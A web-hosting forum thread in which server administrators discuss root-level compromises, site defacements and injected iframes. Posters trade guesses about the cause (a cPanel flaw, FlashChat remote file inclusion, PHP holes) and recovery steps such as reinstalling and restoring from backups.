noimad1

Well-Known Member
Mar 27, 2003
628
0
166
Did that latest bulletin about upgrading becuase of a security risk mean that users could get ahold of the root user on a server?

I just had a server hacked, and just realized that particular server wasn't upgraded when we did all of the upgrades.

This user got full root access, and defaced all of our websites. This is the first time I've ever been hacked at the root level.

I'm wondering if they did this using this security problem...
 

designeru

Well-Known Member
Nov 2, 2005
83
0
156
Answers...

noimad1 said:
Did that latest bulletin about upgrading becuase of a security risk mean that users could get ahold of the root user on a server?
Yes.

I'm wondering if they did this using this security problem...
Did he left any logs? Are you sure it was a root level hack?
 

noimad1

Well-Known Member
Mar 27, 2003
628
0
166
designeru said:
Yes.


Did he left any logs? Are you sure it was a root level hack?
The files he was running were owned by root, and he defaced every site on the server.....
 

lbccserv

Active Member
Mar 23, 2004
38
0
156
damnit, i just got rooted too. changed every index on the site. definately root. SHIT.
 

lbccserv

Active Member
Mar 23, 2004
38
0
156
10.9 c43... i was running 2.4.22-1.2115.nptl. Im not saying it was cpanel, but i dont know what else would have dropped him into root. I havent seen any really bad kernel exploits for 2.4
 

cPDan

cPanel Staff
Staff member
Mar 9, 2004
716
8
243
dgbaker said:
Check if any users are using FlashChat for VB, there is a known security hole in unpatched FlashChat that will do exactly this.
Excellent point, also several other common PHP scripts do this also (at times even just because its PHP - think XSS from a simple phpinfo script that was finally fixed just recently).

Make sure /tmp is tight and your PHP is not too loose.

I know of some comapanies offering hosting servers that do not have PHP on them (since its then faster and more secure) and they report *no* hackings on those vs their PHP ones with constant issues and monitoring for well intentioned but nevertheless destructive PHP scripts)

The trick is educating people on alternative projects to replace their PHP based stuff and helping them do so. but thats a whole other thread :)
 

mctDarren

Well-Known Member
Jan 6, 2004
665
4
168
New Jersey
cPanel Access Level
Root Administrator
The current Moodle exploit is the soup du jour this week, could be that... could be one of a hundred different php holes open at the moment. :D

Fixed typo.. :/
 
Last edited:

LS_Drew

Well-Known Member
Feb 20, 2003
187
0
166
dgbaker said:
Check if any users are using FlashChat for VB, there is a known security hole in unpatched FlashChat that will do exactly this.
How is FlashChat for VB going to give someone root? A shell, sure, but root?
 

dgbaker

Well-Known Member
PartnerNOC
Sep 20, 2002
2,576
9
343
Toronto, Ontario Canada
cPanel Access Level
DataCenter Provider
Take a look at the VB forum with regards to this. It does and did happen.

From SecurityFocus
FlashChat Multiple Remote File Include Vulnerabilities

FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage this issue to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

FlashChat 4.6.1 and previous versions are vulnerable.
 
Last edited:

jester.ro

Well-Known Member
PartnerNOC
Feb 6, 2004
304
0
166
Bucharest, Romania
cPanel Access Level
DataCenter Provider
i don't get this.
php security holes, xss and remote file inclusion is something we deal with everyday.

but gaining root from one of these exploits?
then how about a malicious user that is hosted on a server?
he has nobody user, and his own user to do evil stuff.

that would mean that NO server is secure, not only those running exploitable php scripts.
 

jugo

Active Member
Nov 23, 2005
44
0
156
That is not root access...

That index page defacement is not a "root" based attack. It is XSS using vulnerabilities in shotty PHP scripts like vWar and PHP-Nuke.

The best way to stop those is to implement restrictive MOD_SECURITY rules liek the ones from gotroot.
 

Skyline_GTR

Member
Jul 31, 2003
7
0
151
how can I possibly fixed the problem? since I have a server that has been infected and most of the websites have a iframe which lead to a trojan website.. how can I fix the problem?


Please help!
 

mikeroq

Registered
Jan 21, 2005
3
0
151
This guy got my site like 10 times, he would delete all my files, and after I had reuploaded them all, he would delete it again.

His name is Vibutx, watch out.
 

noimad1

Well-Known Member
Mar 27, 2003
628
0
166
Skyline_GTR said:
how can I possibly fixed the problem? since I have a server that has been infected and most of the websites have a iframe which lead to a trojan website.. how can I fix the problem?


Please help!

The best thing to do would be to reload your OS and Cpanel, then restore all of your files from a backup if you have one before the attack. Then make sure your OS and Cpanle are both up to date and patched.

That's what we did on our server. It has been a huge nightmare. I hope the patches take care of this issue and it doesn't happen again...
 

Murtaza_t

Well-Known Member
Jan 24, 2005
476
0
166
Earth
cPanel Access Level
Website Owner
Skyline_GTR said:
how can I possibly fixed the problem? since I have a server that has been infected and most of the websites have a iframe which lead to a trojan website.. how can I fix the problem?


Please help!
The best way would be intallating rootkit which will repair all your ssh command if they are infected and will also take care of any torjan installed. And just replace the index pages.. as far as I know they replace only index pages.. AND also try and get some good mod_sec rules.

And also UPCP --force.. that will over write complete cpanel which is as good as intalling new cpanel software. You might also need to reinstall customized skins as upcp will skip them.

You can also write a bash script that will check and list the files that has iframes in them.
 

Skyline_GTR

Member
Jul 31, 2003
7
0
151
My forum has been affected and everytime when I make a quick reply, it will have this iframe under the last post.. however when I disable javascript, this won't happen..

As well, for my other websites, I looked at the index and the templates but I couldn't find any iframe codes at all..
 

Murtaza_t

Well-Known Member
Jan 24, 2005
476
0
166
Earth
cPanel Access Level
Website Owner
Skyline_GTR said:
My forum has been affected and everytime when I make a quick reply, it will have this iframe under the last post.. however when I disable javascript, this won't happen..

As well, for my other websites, I looked at the index and the templates but I couldn't find any iframe codes at all..
This is what you should follow:
1. Backup forums.
2. Backup Database
3. Uninstall forums.
4. Install new forums.
5. Restore database.
6. Moves images/upload folder in to new installation.

If that does not help you will need to check your database as it might be affected then.